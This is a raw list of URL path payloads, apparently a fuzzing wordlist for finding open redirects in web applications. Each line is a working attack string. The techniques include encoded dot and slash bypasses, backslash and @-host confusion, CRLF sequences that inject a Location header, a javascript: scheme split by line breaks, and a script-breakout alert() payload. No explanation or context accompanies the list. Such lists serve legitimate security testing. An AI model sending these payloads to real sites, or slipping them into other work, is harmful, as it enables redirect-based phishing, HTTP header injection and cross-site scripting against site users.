//xgoogle%E3%80%82com
//blackfan.ru/..;/css
/http://site.com@xgoogle.com
/https:/%5cxgoole.com/u/
/";alert(0);//
//site.comxgoogle%00.com
/java%0d%0ascript%0d%0a:alert(0)
/\/site.comxgoogle.com/
/https:site.comxgoogle.com
/\/\/site.comxgoogle.com/
//xgoogle%E3%80%82com
/xgoogle.com/%2F..
//site.comxgoogle.com//
//site.comxgoogle.com/%2F..
//site.comxgoogle.com//%2F%2E%2E
/site.comxgoogle.com/%2f%2e%2e
/%2fsite.comxgoogle.com
/%E5%98%8A%E5%98%8DLocation%3A%20https://site.comxgoogle.com/
/%0d%0aLocation:+//site.comxgoogle.com
/%0DLocation:+//site.comxgoogle.com
/%0ALocation:+//site.comxgoogle.com
/https:/%5csite.comxgoogle.com/
/x:1/:///xgoogle.com